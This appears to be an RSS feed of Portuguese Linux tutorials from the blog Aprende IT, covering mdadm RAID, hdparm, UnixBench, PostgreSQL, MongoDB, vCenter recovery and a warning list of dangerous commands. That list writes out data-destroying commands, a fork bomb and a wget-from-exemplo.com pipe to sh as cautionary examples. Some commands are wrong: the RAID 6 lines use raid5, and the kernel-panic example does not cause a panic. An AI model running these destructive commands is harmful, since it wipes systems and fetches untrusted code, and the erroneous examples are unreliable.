  • RAID 1+0: Este é um RAID 0 de dois espelhos (RAID 1). Dois RAID 1 são criados com cada par de discos e com o par de discos RAID 1 criado, é criado um RAID 0.
  • RAID 50 (5+0): É necessário um mínimo de 6 discos para este RAID. Com cada trio de discos é criado um RAID 5. Depois com cada RAID criado é criado um RAID 0 com o RAID 5 criado. Com 6 discos, é atingido um total de aproximadamente 65% da capacidade do disco.

Os tipos RAID mais comuns são

  • RAID 0: Para armazenamento de dados não críticos, dos quais a perda não é importante.
  • RAID 1: Para sistemas operativos, por exemplo, em servidores. O sistema operativo é normalmente instalado em RAID 1.
  • RAID 5: Armazenamento em geral, devido ao seu baixo custo e boa fiabilidade.

Como montar em linux cada tipo de RAID com “mdadm”:

Uma incursão no linux é muito fácil de montar utilizando os seguintes passos:

Passo 1: Instalar mdadm: por defeito não é normalmente instalado no Linux.

Em debian e derivados:

apt-get install mdadm

Em RedHat / CentOS e derivados:

yum install mdadm

install-mdadmPasso 2: Os discos a serem incluídos no RAID devem ser preenchidos com zeros para evitar problemas com os sistemas de ficheiros existentes:

root@localhost:~# mdadm --zero-superblock /dev/hdb /dev/hdc

(E tantos outros discos para usar) ou com DD:

dd

Passo 3: O próximo passo seria criar o RAID, basicamente com ele:

mdadm -C /dev/NOMBRERAID --level=raid[NUMERO] --raid-devices=NUMERO_DE_DISCOS /dev/DISCO1 /dev/DISCO2
  • RAID 0: São seleccionados pelo menos dois discos (por exemplo, vdc e vdd):
mdadm -C /dev/md0 --level=raid0 --raid-devices=2 /dev/vdc /dev/vdd

 

RAID-0-terminal

Como crear un RAID por software en linux con mdadm

  • RAID 1: No caso do RAID 1 é melhor seleccionar um máximo de 2 discos / volumes (usamos vdc e vdd como exemplos):

 

mdadm -C /dev/md0 --level=raid1 --raid-devices=2 /dev/vdc /dev/vdd

 

raid1

  • RAID 5: Pelo menos três discos:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 /dev/vdb /dev/vdc /dev/vdd

 

raid5

Se quisermos um disco de reserva (temos de adicionar todos os discos incluindo o de reserva ao RAID desde o início):

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

 

  • RAID 6: Pelo menos 4 discos

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=4 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

E com spares:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=4 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde /dev/vdf

 

 

Em caso de falha de um disco RAID só temos de o remover e inserir o novo disco e quando inserimos o novo disco (olhando para o log in /var/log/messages do sistema) executamos:

 

mdadm --add /dev/RAID /dev/NUEVO_DISCO

 

No caso de querer parar um RAID:

 

mdadm --stop /dev/md0 && mdadm --remove /dev/md0
Y para consultar el estado:

cat /proc/mdstat

E isso é tudo sobre como criar um RAID de software em linux com mdadm.

Se gostou do artigo, deixe um comentário e/ou partilhe-o nas suas redes sociais.

Até breve!

La entrada Como criar um software RAID em linux com mdadm se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/como-criar-um-software-raid-em-linux-com-mdadm/feed/ 0
Comandos que não devem ser executados no Linux https://aprendeit.com/pt/comandos-que-nao-devem-ser-executados-no-linux/ https://aprendeit.com/pt/comandos-que-nao-devem-ser-executados-no-linux/#respond Sun, 25 Feb 2024 20:30:11 +0000 https://aprendeit.com/?p=6079 No vasto mundo do Linux, o terminal é uma ferramenta poderosa que concede aos usuários um controle sem precedentes sobre os seus sistemas. No entanto, com grande poder vem grande ...

La entrada Comandos que não devem ser executados no Linux se publicó primero en Aprende IT.

]]>
No vasto mundo do Linux, o terminal é uma ferramenta poderosa que concede aos usuários um controle sem precedentes sobre os seus sistemas. No entanto, com grande poder vem grande responsabilidade. Existem certos comandos que, embora possam parecer inofensivos ou curiosos à primeira vista, podem causar danos irreparáveis ao seu sistema. Neste artigo, exploraremos dez desses comandos letais, explicando em detalhe por que deve mantê-los longe do seu terminal.

O Devastador rm -rf /

Começamos com o infame comando rm -rf /, uma sentença que parece simples mas esconde um potencial destrutivo. Este comando apaga todos os ficheiros do sistema, começando pela raiz (/). O modificador -r indica que a eliminação deve ser recursiva, ou seja, afetar todos os ficheiros e diretórios contidos no diretório especificado, enquanto -f força a eliminação sem pedir confirmação. Executar este comando como superusuário significa dizer adeus ao seu sistema operativo, aos seus dados e a qualquer esperança de recuperação fácil.

Em resumo, é preciso ter cuidado ao executar comandos rm recursivos, pois podemos eliminar mais do que queremos:

  • rm -fr *
  • rm -fr */
  • rm -fr /*
  • rm -fr .
  • rm -fr ..

A Armadilha de :(){ :|: & };:

Este comando enigmático é um exemplo de uma função fork bomb. Define-se uma função chamada : que, quando executada, chama-se a si mesma duas vezes, e cada chamada é executada em background. Isso causa uma reação em cadeia, duplicando processos indefinidamente e consumindo os recursos do sistema até que este trave. É um ataque de negação de serviço contra a sua própria máquina, levando ao limite a capacidade de processamento e memória.

Para entender melhor, :(){ :|: & };: é o mesmo que executar:

bomb() {
    bomb | bomb &;
}; bomb

O Perigo de dd if=/dev/zero of=/dev/sda

O comando dd é uma ferramenta poderosa usada para converter e copiar ficheiros a nível de bloco. Neste contexto, if=/dev/zero define a entrada para um fluxo contínuo de zeros, e of=/dev/sda designa o dispositivo de destino, geralmente o disco rígido principal. Este comando sobrescreve todo o disco com zeros, apagando irreversivelmente o sistema operativo, os programas e os dados do utilizador. É essencial compreender a função de cada parte do comando antes de executar algo tão poderoso como dd.

Descarregar e Executar um Ficheiro Malicioso

Por exemplo, o comando wget http://exemplo.com/malicioso.sh -O- | sh

Este comando utiliza wget para descarregar um script de um endereço da Internet e executa-o diretamente na shell com sh. O perigo reside em executar código sem rever, proveniente de uma fonte não confiável. Pode tratar-se de um script malicioso desenhado para danificar o seu sistema ou comprometer a sua segurança. É sempre vital verificar o conteúdo dos scripts antes de executá-los.

Modificação Perigosa de Permissões e Propriedades

A modificação de permissões com, por exemplo, chmod 777 / -R pode deixar o seu sistema inutilizável.
chmod altera as permissões de ficheiros e diretórios, e 777 concede permissões totais (leitura, escrita e execução) a todos os utilizadores. Aplicar isto de forma recursiva (-R) à raiz (/) elimina qualquer forma de controlo de acesso, expondo o sistema a riscos de segurança graves. Qualquer utilizador poderia modificar qualquer ficheiro, com potenciais consequências desastrosas.

O Comando chown nobody:nogroup / -R

Semelhante ao caso anterior, chown altera o proprietário e o grupo de ficheiros e diretórios. Usar nobody:nogroup atribui a propriedade a um utilizador e grupo sem privilégios, aplicado de forma recursiva a partir da raiz, pode deixar o sistema num estado inoperável, uma vez que os serviços e processos críticos poderiam perder o acesso aos ficheiros necessários para o seu funcionamento.

O Misterioso mv /home/o_seu_usuario/* /dev/null

Mover ficheiros para o diretório /dev/null é equivalente a eliminá-los, pois /dev/null é um buraco negro no sistema que descarta tudo o que recebe. Este comando, aplicado ao diretório do utilizador, pode resultar na perda de todos os dados pessoais, configurações e ficheiros importantes armazenados no seu home.

O Perigoso find

O comando find pode ser muito perigoso, por exemplo, se executarmos o seguinte comando:

find / -name '*.jpg' -type f -delete

O que acontece é que find é uma ferramenta versátil para procurar ficheiros no sistema de ficheiros que cumpram com certos critérios. Este comando procura todos os ficheiros .jpg no sistema e elimina-os. Embora possa parecer útil para libertar espaço, eliminar indiscriminadamente ficheiros baseando-se apenas na sua extensão pode resultar na perda de documentos importantes, memórias e recursos.

 

Causar um Kernel Panic

O seguinte comando é capaz de causar um kernel panic:

echo 1 > /proc/sys/kernel/panic;

Provocar um erro de Kernel Panic no Linux é comparável à temida tela azul da morte no Windows, desmistificando a crença de que o Linux é infalível. Através de certos comandos, como redirecionar dados aleatórios para dispositivos críticos do sistema ou manipular diretamente a memória, pode forçar o Linux a entrar num estado de pânico do kernel, tornando o sistema irrecuperável sem um reinício. Estes comandos são altamente arriscados e podem resultar na perda de dados ou na corrupção do sistema.

Sobrescrever o Disco de Sistema com a Saída de um Comando

Sobrescrever o disco rígido no Linux, usando comandos que redirecionam a saída de qualquer comando Bash diretamente para um dispositivo de disco (/dev/hda), pode resultar na perda total de dados. Este processo é irreversível e difere da formatação, pois implica escrever dados brutos sobre toda a unidade, tornando-a inutilizável. É uma ação altamente perigosa sem benefício prático na maioria dos contextos.

Um exemplo disto seria:

comando1 > /dev/sda1

Proteja o Seu Sistema, Proteja a Sua Paz de Espírito

Explorar e experimentar com o Linux pode ser uma experiência recompensadora e educativa. No entanto, é crucial fazê-lo com conhecimento e precaução. Os comandos discutidos aqui representam apenas uma fração do que é possível (e potencialmente perigoso) no terminal. A regra de ouro é simples: se não tem a certeza do que um comando faz, investigue antes de executá-lo. Proteger o seu sistema é proteger o seu trabalho, as suas memórias e, em última análise, a sua paz de espírito.

 

 

La entrada Comandos que não devem ser executados no Linux se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/comandos-que-nao-devem-ser-executados-no-linux/feed/ 0
Testes de Desempenho em Linux com UnixBench https://aprendeit.com/pt/testes-de-desempenho-em-linux-com-unixbench/ https://aprendeit.com/pt/testes-de-desempenho-em-linux-com-unixbench/#respond Tue, 26 Dec 2023 06:46:32 +0000 https://aprendeit.com/?p=5984 Para entusiastas de Linux, realizar testes de desempenho é fundamental para aproveitar ao máximo os seus sistemas. UnixBench é uma ferramenta essencial neste processo, oferecendo uma análise detalhada do desempenho ...

La entrada Testes de Desempenho em Linux com UnixBench se publicó primero en Aprende IT.

]]>
Para entusiastas de Linux, realizar testes de desempenho é fundamental para aproveitar ao máximo os seus sistemas. UnixBench é uma ferramenta essencial neste processo, oferecendo uma análise detalhada do desempenho dos sistemas Linux e Unix.

O que é UnixBench?

UnixBench é um conjunto de testes de desempenho de código aberto projetado para sistemas Unix e Linux. Caracteriza-se pela facilidade de uso e profundidade, permitindo medir o desempenho de vários componentes do sistema.

Instalação do UnixBench

A instalação do UnixBench é simples e é realizada através de alguns comandos no terminal:
Clona o repositório do UnixBench:

git clone https://github.com/kdlucas/byte-unixbench.git

Acede ao diretório UnixBench:

cd byte-unixbench/UnixBench

Compila e constrói o UnixBench:

make

Executando o Teu Primeiro Teste com UnixBench

Para lançar o teu primeiro teste, segue estes passos:
Na mesma pasta do UnixBench, executa:

./Run

Isso iniciará uma série de testes que avaliarão diferentes aspetos do teu sistema.

Análise dos Resultados

Os resultados do UnixBench são apresentados em forma de pontuações e dados, proporcionando uma ideia clara do desempenho do teu sistema em áreas como a CPU, a memória e as operações de disco.

Testes Avançados

O UnixBench permite realizar testes específicos para diferentes componentes. Por exemplo, para focar na CPU:

./Run dhry2reg whetstone-double

Personalizando os Testes

O UnixBench oferece a flexibilidade de personalizar os testes. Podes escolher quais testes executar e adaptá-los às tuas necessidades específicas.

Monitorização em Tempo Real

Enquanto os testes estão a decorrer, é útil realizar uma monitorização em tempo real do sistema usando ferramentas como top ou htop.

Testes de Desempenho de Rede

Além dos componentes básicos, o UnixBench também pode avaliar o desempenho da rede do teu sistema, um aspeto crucial para servidores ou ambientes dependentes de rede.

Integração com Ferramentas de Monitorização

O UnixBench pode ser integrado com ferramentas avançadas de monitorização de sistemas, proporcionando uma análise detalhada do desempenho do sistema durante os testes.

Dicas para Otimizar o Desempenho

Após os testes, podes identificar áreas para melhorias e começar a otimizar o teu sistema, ajustando configurações, atualizando hardware ou modificando o ambiente de software.

La entrada Testes de Desempenho em Linux com UnixBench se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/testes-de-desempenho-em-linux-com-unixbench/feed/ 0
Utilitário hdparm: Afina o Teu Disco https://aprendeit.com/pt/utilitario-hdparm-afina-o-teu-disco/ https://aprendeit.com/pt/utilitario-hdparm-afina-o-teu-disco/#respond Tue, 05 Dec 2023 06:41:16 +0000 https://aprendeit.com/?p=5949 Queres tirar o máximo partido do teu disco rígido ou SSD? O hdparm é a tua ferramenta. Desenvolvido por Mark Lord em 2005, esta utilidade Linux permite-te diagnosticar e otimizar ...

La entrada Utilitário hdparm: Afina o Teu Disco se publicó primero en Aprende IT.

]]>
Queres tirar o máximo partido do teu disco rígido ou SSD? O hdparm é a tua ferramenta. Desenvolvido por Mark Lord em 2005, esta utilidade Linux permite-te diagnosticar e otimizar o teu disco, controlar a sua velocidade, gerir a poupança de energia e até apagar de forma segura SSDs.

Instalação e Uso Básico

A maioria das distribuições Linux já inclui o hdparm. Para começar, abre um terminal e executa:

 hdparm -I /dev/sda | more

Este comando mostrar-te-á toda a informação disponível sobre o teu disco, incluindo o modelo e a versão do firmware.

Medindo a Velocidade do Disco

Para conhecer a velocidade de transferência de dados do teu disco, utiliza:

 hdparm -t /dev/sda

Repete a medição várias vezes para obter uma média. Se quiseres medir a velocidade pura do disco, sem o efeito do buffer do sistema, usa hdparm -t --direct /dev/sda. Podes também especificar um deslocamento com hdparm -t --direct --offset 500 /dev/sda para testar diferentes áreas do disco.

Otimizando a Transmissão de Dados

Para melhorar a transmissão de dados, o hdparm permite ajustar a quantidade de setores que são lidos de uma vez com o comando:

hdparm -m16 /dev/sda

Este comando configura a leitura de 16 setores simultaneamente. Além disso, podes ativar a função “read-ahead” com hdparm -a256 /dev/sda, o que faz com que o disco leia antecipadamente 256 setores.

Controlo do Modo 32-Bit e do Ruído do Disco

Com hdparm -c /dev/sda, podes verificar se o teu disco está a funcionar em modo 32-bit, e forçar este modo com -c3. Se o teu disco é ruidoso, podes reduzir o ruído ativando o “modo acústico” com hdparm -M 128 /dev/sda, ou maximizar a velocidade com `hdparm -M 254 /dev/sda​​​​.

Gestão da Cache de Escrita

O comando hdparm -W /dev/sda permite-te ativar ou desativar a cache de escrita, o que pode acelerar a escrita de dados mas com o risco de perda de dados em caso de cortes de energia.

Configuração do Modo de Poupança de Energia

Podes gerir a poupança de energia do disco com hdparm -B255 /dev/sda para a desativar, ou usar valores entre 1 e 254 para diferentes níveis de poupança e desempenho. Com hdparm -S 128 /dev/sda, ajustas o tempo de inatividade antes de o disco entrar em modo de repouso.

Limpeza de SSDs

Os SSDs podem acumular blocos de dados residuais. Para limpá-los, usa o script wiper.sh /dev/sda, mas com precaução, pois pode levar à perda de dados.

Apagamento Seguro em SSDs

Para apagar de forma segura um SSD, o hdparm oferece a função de “apagamento seguro” com

hdparm --user-master u --security-erase 123456 /dev/sdb

Este processo elimina completamente os dados, mas requer precaução, pois pode tornar o SSD inutilizável em alguns casos.

Manuseamento de Discos IDE Antigos

Para os discos IDE, é importante rever e configurar o DMA com hdparm -d1 /dev/hda para melhorar a transferência de dados. Se encontrares problemas, desativa-o com `hdparm -d0 /dev/hda​​.

Mantendo as Alterações Após Reiniciar

Para garantir que as alterações feitas com o hdparm persistam após reiniciar, deves adicioná-las aos scripts de arranque do sistema ou, em sistemas baseados em Debian, no arquivo /etc/hdparm.conf.
Lembra-te que esta é uma ferramenta poderosa e deve ser usada com conhecimento. Faz sempre cópias de segurança antes de realizar alterações significativas e consulta a documentação específica.

La entrada Utilitário hdparm: Afina o Teu Disco se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/utilitario-hdparm-afina-o-teu-disco/feed/ 0
Introdução ao PostgreSQL https://aprendeit.com/pt/introducao-ao-postgresql/ https://aprendeit.com/pt/introducao-ao-postgresql/#respond Mon, 20 Nov 2023 10:42:02 +0000 https://aprendeit.com/?p=5794 Bem-vindo a este artigo onde vou introduzir-te ao mundo do PostgreSQL. Já ouviste falar deste sistema de gestão de bases de dados? Se a tua resposta é não, ou se ...

La entrada Introdução ao PostgreSQL se publicó primero en Aprende IT.

]]>
Bem-vindo a este artigo onde vou introduzir-te ao mundo do PostgreSQL. Já ouviste falar deste sistema de gestão de bases de dados? Se a tua resposta é não, ou se simplesmente queres aprofundar os teus conhecimentos, chegaste ao lugar certo. Aqui, vou explicar o que é o PostgreSQL, como instalá-lo no Ubuntu e como gerir de forma básica uma instância do PostgreSQL a partir da consola.

O que é o PostgreSQL?

O PostgreSQL é um sistema de gestão de bases de dados relacionais (RDBMS) de código aberto. É conhecido pela sua robustez, capacidade de lidar com grandes volumes de dados e pela sua conformidade com os padrões SQL. O grande ponto a favor do PostgreSQL é que ele não só permite trabalhar com dados relacionais, mas também suporta consultas JSON, o que te dá muita flexibilidade.
Este sistema é amplamente utilizado em todo o tipo de aplicações, desde pequenas aplicações móveis até grandes sistemas de gestão de bases de dados para websites com muito tráfego. A sua comunidade ativa e desenvolvimento constante tornam-no uma opção muito atrativa para programadores e administradores de sistemas.

Instalar o PostgreSQL no Ubuntu

Instalar o PostgreSQL no Ubuntu é um processo bastante direto. O Ubuntu tem o PostgreSQL nos seus repositórios por defeito, tornando a instalação tão fácil quanto executar alguns comandos no terminal.
Para começar, abre um terminal no teu sistema Ubuntu e segue estes passos:

  1. Primeiro, atualiza o índice de pacotes do teu sistema com o comando sudo apt update.
  2. Depois, instala o pacote PostgreSQL usando sudo apt install postgresql postgresql-contrib. Este comando vai instalar o PostgreSQL juntamente com alguns módulos adicionais úteis.

Uma vez completa a instalação, o serviço PostgreSQL iniciará automaticamente no teu sistema. Para verificar se o PostgreSQL está a funcionar, podes usar o comando sudo systemctl status postgresql.

Gestão Básica do PostgreSQL a partir da Consola

Agora que tens o PostgreSQL instalado, é hora de aprenderes alguns comandos básicos para gerires a tua base de dados a partir da consola.

Acedendo ao PostgreSQL

O PostgreSQL cria um utilizador padrão chamado postgres. Para começares a usar o PostgreSQL, precisarás mudar para este utilizador. Podes fazer isso com o comando sudo -i -u postgres. Uma vez feito isto, podes aceder à consola do PostgreSQL com o comando psql.

Criar uma Base de Dados e um Utilizador

Criar uma base de dados e um utilizador é fundamental para começares. Para criar uma nova base de dados, usa o comando CREATE DATABASE nome_da_tua_base;.
Para criar um novo utilizador, usa o comando CREATE USER teu_utilizador WITH PASSWORD 'tua_password';. É importante que escolhas uma password segura.

Atribuir Privilégios

Após criares a tua base de dados e utilizador, vais querer atribuir os privilégios necessários ao utilizador. Isto é feito com o comando GRANT ALL PRIVILEGES ON DATABASE nome_da_tua_base TO teu_utilizador;.

Operações Básicas

Com a tua base de dados e utilizador configurados, podes começar a realizar operações básicas. Algumas das mais comuns incluem:

  • INSERT: Para inserir dados nas tuas tabelas.
  • SELECT: Para ler dados.
  • UPDATE: Para atualizar dados existentes.
  • DELETE: Para eliminar dados.

Estes comandos formam a base da linguagem SQL e permitir-te-ão interagir com os teus dados de forma eficaz.

Gerir a Segurança no PostgreSQL

A segurança é crucial quando se trata de bases de dados. O PostgreSQL oferece várias funcionalidades para proteger os teus dados. Uma delas é a encriptação de conexão, que podes configurar para assegurar a comunicação entre a tua aplicação e a base de dados.
Também é importante que revises e atualizes regularmente as tuas passwords e que gerencies cuidadosamente as permissões dos utilizadores para garantir que só têm acesso ao que necessitam.

Manutenção e Desempenho

Manter a tua base de dados PostgreSQL em bom estado é vital para assegurar um desempenho ótimo. O PostgreSQL vem com algumas ferramentas que te ajudarão nesta tarefa, como o comando VACUUM, que ajuda a limpar a base de dados e a recuperar espaço.
Além disso, é aconselhável que realizes cópias de segurança de forma regular. Podes usar o comando pg_dump para fazer uma cópia de segurança da tua base de dados.

Dicas e Melhores Práticas

Para terminar, aqui vão algumas dicas e melhores práticas que te ajudarão a tirar o máximo proveito do PostgreSQL:

  • Mantém-te atualizado com as atualizações do PostgreSQL para aproveitares as melhorias e correções de segurança.
  • Aprende sobre índices e como podem melhorar o desempenho das tuas consultas.
  • Familiariza-te com as ferramentas de monitorização do PostgreSQL para manteres um olho no desempenho e na saúde da tua base de dados.

Espero que este artigo te tenha proporcionado uma boa base sobre o PostgreSQL. Embora não tenhamos chegado a uma conclusão formal, espero que este conteúdo seja o início da tua jornada no mundo das bases de dados com o PostgreSQL. Boa sorte!

La entrada Introdução ao PostgreSQL se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/introducao-ao-postgresql/feed/ 0
Cómo Empezar com o MongoDB: O Teu Guia Definitivo https://aprendeit.com/pt/como-empezar-com-o-mongodb-o-teu-guia-definitivo/ https://aprendeit.com/pt/como-empezar-com-o-mongodb-o-teu-guia-definitivo/#respond Tue, 07 Nov 2023 11:18:16 +0000 https://aprendeit.com/?p=5866 O MongoDB é um daqueles termos que, se trabalhas no desenvolvimento de software ou na gestão de bases de dados, provavelmente ouviste repetidamente. E não é por acaso, pois a ...

La entrada Cómo Empezar com o MongoDB: O Teu Guia Definitivo se publicó primero en Aprende IT.

]]>
O MongoDB é um daqueles termos que, se trabalhas no desenvolvimento de software ou na gestão de bases de dados, provavelmente ouviste repetidamente. E não é por acaso, pois a sua flexibilidade e potência revolucionaram a forma como armazenamos e recuperamos dados na era moderna. Neste artigo, vou guiar-te para que compreendas o que é o MongoDB, como difere das bases de dados SQL tradicionais, como podes instalá-lo no Ubuntu e geri-lo a partir do console, e, claro, por que configurar um cluster pode ser uma grande vantagem para os teus projetos.

O Que é o MongoDB?

O MongoDB é um sistema de base de dados NoSQL, orientado a documentos e de código aberto, que ganhou popularidade devido à sua capacidade de manusear grandes volumes de dados de forma eficiente. Em vez de tabelas, como nas bases de dados relacionais, o MongoDB utiliza coleções e documentos. Um documento é um conjunto de pares chave-valor, que no mundo do MongoDB é representado num formato chamado BSON (uma versão binária de JSON). Esta estrutura torna-o muito flexível e fácil de escalar, o que o torna especialmente adequado para aplicações web modernas e o manuseio de dados em formato JSON, comum no desenvolvimento de aplicações web e móveis.

A Diferença Entre SQL e NoSQL

Para entender melhor o MongoDB, é crucial diferenciar entre as bases de dados SQL e NoSQL. As bases de dados SQL (como MySQL, PostgreSQL ou Microsoft SQL Server) utilizam uma linguagem de consulta estruturada (SQL) e baseiam-se num esquema de dados predefinido. Isso significa que precisas saber antecipadamente como os teus dados serão estruturados e aderir a essa estrutura, o que oferece um alto grau de consistência e transações ACID (Atomicidade, Consistência, Isolamento e Durabilidade).
Por outro lado, as bases de dados NoSQL, como o MongoDB, são esquematicamente dinâmicas, permitindo-te guardar documentos sem ter que definir a sua estrutura antecipadamente. São ideais para dados não estruturados ou semi-estruturados e oferecem uma escalabilidade horizontal, o que significa que podes adicionar mais servidores facilmente para lidar com mais carga.

Instalação do MongoDB no Ubuntu

Colocar o MongoDB em funcionamento no teu sistema Ubuntu é um processo bastante simples, mas requer seguir alguns passos com atenção. Aqui explico-te como fazer:

Atualização do Sistema

Antes de instalar qualquer pacote novo, é sempre uma boa prática atualizar a lista de pacotes e as versões de software do teu sistema operativo com os seguintes comandos:

sudo apt update
sudo apt upgrade

Instalação do Pacote do MongoDB

O Ubuntu tem o MongoDB nos seus repositórios predefinidos, mas para te certificares de obter a última versão, é recomendável usar o repositório oficial do MongoDB. Aqui mostro-te como configurá-lo e realizar a instalação:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv E52529D4
echo "deb [ arch=amd64,arm64 ] http://repo.mongodb.org/apt/ubuntu $(lsb_release -cs)/mongodb-org/4.4 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list
sudo apt update
sudo apt install -y mongodb-org

Colocar o MongoDB em Funcionamento

Uma vez instalado, podes iniciar o servidor do MongoDB com o seguinte comando:

sudo systemctl start mongod

Se além disso quiseres que o MongoDB inicie automaticamente com o sistema, executa:

sudo systemctl enable mongod

Verificação da Instalação

Para verificar que o MongoDB está instalado e a funcionar corretamente, usa:

sudo systemctl status mongod

Ou podes tentar conectar-te ao servidor MongoDB utilizando o seu shell:

mongo

Gestão Básica do MongoDB a Partir do Console

Agora que tens o MongoDB a funcionar na tua máquina Ubuntu, é hora de aprender alguns comandos básicos para gerir a tua instância do MongoDB a partir do console.

Criar e Usar uma Base de Dados

Para criar uma nova base de dados, simplesmente usa o comando use seguido do nome da tua base de dados:

use minhaBaseDeDados

Se a base de dados não existir, o MongoDB irá criá-la quando guardares nela o teu primeiro documento.

Inserir Dados

Para inserir dados numa coleção, podes usar o comando insert. Por exemplo:

db.minhaColecao.insert({ nome: "Alice", idade: 25 })

Isto adicionará um novo documento à coleção minhaColecao.

Ler Dados

Podes ler ou procurar documentos numa coleção com o comando find. Por exemplo:

db.minhaColecao.find({ nome: "Alice" })

Isto procurará todos os documentos onde o nome seja “Alice”.
Atualizar Dados

Para atualizar documentos, usarias update. Por exemplo:

db.minhaColecao.update({ nome: "Alice" }, { $set: { idade: 26 } })

Isto atualizará a idade de Alice para 26.

Eliminar Dados

E para eliminar documentos, simplesmente usas remove:

db.minhaColecao.remove({ nome: "Alice" })

Isto eliminará todos os documentos onde o nome seja “Alice”.

A Potência dos Clusters do MongoDB

Embora a gestão de uma instância simples do MongoDB possa ser suficiente para muitos projetos, especialmente durante as fases de desenvolvimento e testes, quando se trata de aplicações em produção com grandes volumes de dados ou altos requisitos de disponibilidade, configurar um cluster do MongoDB pode ser essencial. Um cluster pode distribuir os dados por vários servidores, o que não só proporciona redundância e alta disponibilidade, mas também melhora o desempenho das operações de leitura e escrita.
Os clusters do MongoDB utilizam o conceito de sharding para distribuir os dados de maneira horizontal e as réplicas para assegurar que os dados estejam sempre disponíveis, mesmo se parte do sistema falhar. Num outro artigo, exploraremos como configurar o teu próprio cluster do MongoDB, mas por agora, é suficiente saber que esta é uma poderosa característica que o MongoDB oferece para escalar a tua aplicação à medida que cresce.

À medida que te aprofundas no mundo do MongoDB, descobrirás que há muito mais para aprender e explorar. Desde a sua integração com diferentes linguagens de programação até às complexidades da indexação e o desempenho das consultas, o MongoDB oferece um mundo de possibilidades que pode adaptar-se a quase qualquer necessidade de aplicação moderna.

Lembra-te que dominar o MongoDB leva tempo e prática, mas começar com os fundamentos colocar-te-á no caminho certo. Experimenta com os comandos, testa diferentes configurações e não tenhas medo de quebrar coisas num ambiente de teste; é a melhor maneira de aprender. A flexibilidade e o poder do MongoDB esperam, e com a base que construíste hoje, estás mais do que pronto para começar a explorar. Mãos à obra!

La entrada Cómo Empezar com o MongoDB: O Teu Guia Definitivo se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/como-empezar-com-o-mongodb-o-teu-guia-definitivo/feed/ 0
Iniciar o vCenter com Conectividade a partir do ESX quando o DVS Não Está a Funcionar https://aprendeit.com/pt/iniciar-o-vcenter-com-conectividade-a-partir-do-esx-quando-o-dvs-nao-esta-a-funcionar/ https://aprendeit.com/pt/iniciar-o-vcenter-com-conectividade-a-partir-do-esx-quando-o-dvs-nao-esta-a-funcionar/#respond Fri, 03 Nov 2023 15:56:45 +0000 https://aprendeit.com/?p=5681 Iniciar o vCenter com Conectividade a partir do ESX quando o DVS não está Funcionando Quando trabalhamos em ambientes virtuais como o VMware, um dos componentes cruciais para a gestão ...

La entrada Iniciar o vCenter com Conectividade a partir do ESX quando o DVS Não Está a Funcionar se publicó primero en Aprende IT.

]]>
Iniciar o vCenter com Conectividade a partir do ESX quando o DVS não está Funcionando

Quando trabalhamos em ambientes virtuais como o VMware, um dos componentes cruciais para a gestão é o vCenter, que atua como o cérebro do centro de dados virtual. Tudo funciona perfeitamente até que, por alguma razão, perdemos a conectividade de rede no vCenter, e é aqui que as coisas podem ficar realmente complicadas, especialmente se estiver a utilizar Distributed Virtual Switches (DVS). Neste artigo, vou orientar você passo a passo sobre como recuperar o seu vCenter e trazê-lo de volta à vida, mesmo quando tudo parece perdido.

O que acontece quando o vCenter perde a conectividade de rede?

Os sintomas deste problema são bastante claros:

  • A rede de gestão existe apenas num DVS.
  • Não existem portas efémeras configuradas no cluster.
  • O vCenter perde a conectividade de rede após uma interrupção não planeada ou planeada.
  • Você não consegue reconectar o vCenter a um grupo de portas DVS nos mesmos hosts ou em hosts diferentes.
  • Você não consegue abrir o cliente vSphere do vCenter para fazer alterações na rede porque a conexão de rede do vCenter está inativa.

Quando tentar modificar a configuração de rede em qualquer host ESXi, ou se desejar alterar os adaptadores de rede para um host ESXi conectado a um DVS com portas não efémeras, encontrará o seguinte erro:
“A adição ou reconfiguração de adaptadores de rede conectados a grupos de portas distribuídas virtuais não efémeras não é suportada.”

Causas do Problema

Se o vCenter estiver ligado a um Distributed Switch e perder o acesso à rede, o vCenter não conseguirá ligar-se a uma porta distribuída porque não tem acesso aos ESXi.
A VMware recomenda configurar portas efémeras para a rede de gestão no seu ambiente para evitar que este problema ocorra novamente.

Impacto e Riscos

Deve ter pelo menos 2 vmnics utilizados para a rede de gestão, pois num dos passos iremos remover um vmnic do grupo de portas de gestão do DVS para o podermos usar no Standard Switch que iremos criar temporariamente.
ATENÇÃO: Se os vmnics estiverem numa configuração LACP, terá de desativá-la no switch físico para evitar tempos de inatividade. Siga este KB para obter instruções sobre como trabalhar com uma configuração LACP.

Se não tiver 2 vmnics no ESXi, é recomendável seguir estes passos através da Shell de DCUI. Caso contrário, perderá o acesso SSH quando executar o comando para remover o vmnic e não poderá continuar o processo.

Solução Passo a Passo

Passo 1: Remover um vmnic conectado ao DVS ligado à Rede de Gestão
Identifique o ID da porta onde o vmnic que deseja remover está conectado ao DVS:

# esxcli network vswitch dvs vmware list | egrep "Cliente: vmnic#" -A3

A saída será semelhante a:

# esxcli network vswitch dvs vmware list | egrep "Cliente: vmnic1" -A3
Cliente: vmnic1
ID do Grupo de Portas: dvportgroup-5008
Em Uso: verdadeiro
ID da Porta: 12

Remova o vmnic:

# esxcfg-vswitch -Q vmnic# -V ID da Porta Nome do DVS

Exemplo usando vmnic1, ID da Porta 12 e Nome do DVS ProdSwitchDVS:

# esxcfg-vswitch -Q vmnic1 -V 12 ProdSwitchDVS

Passo 2: Criar um Standard Switch, um Portgroup, adicionar o vmnic ao Standard Switch

Crie um Standard Switch:

# esxcli network vswitch standard add --nome-do-vswitch=vSwitchName

Crie um Portgroup:

# esxcli network vswitch standard portgroup add --nome-do-portgroup=Nome-do-Portgroup --nome-do-vswitch=vSwitchName

Adicione um vmnic ao Standard Switch:

